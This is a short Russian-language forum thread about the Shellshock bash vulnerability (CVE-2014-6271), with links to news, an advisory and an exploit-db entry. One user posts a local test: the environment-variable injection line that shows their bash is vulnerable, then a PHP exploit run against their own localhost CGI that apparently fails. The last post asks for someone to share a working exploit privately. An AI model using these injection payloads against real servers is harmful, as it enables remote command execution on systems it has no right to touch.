CVE-2014-6271

Собственно, сабж.
Уязвимости 22 года
http://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html
http://seclists.org/oss-sec/2014/q3/649

 

Ну как бы новое хорошо забытое старое что ли

 

Все современные поцаны юзают zsh и btrfs.

 

http://www.exploit-db.com/exploits/34766/

 

Наконец нашел время на потестировать. Сполйт так и не заработал у меня. Хотя баш у меня уявзим. У кого то заработало?

Code:

[andry@localhost exp]$ x='() { echo «hi mom»; };echo «hi bro»' bash -c 'echo bye dad'
«hi bro»
bye dad
[andry@localhost exp]$ ls /tmp |grep lala
[andry@localhost exp]$ php Bash-CVE-2014-6271.php -u http://localhost/cgi-bin/1.cgi -c "ls -la > /tmp/lalala.txt"
 
Command sent to the server!
[andry@localhost exp]$ ls /tmp |grep lala
[andry@localhost exp]$ 

Правда в КДЕ вылетает в ABRT следующее:

PHP:

bash сбой

Process /usr/bin/bash was killed by signal 11 (SIGSEGV)


 

Кто поделится сплойтом? ПМ.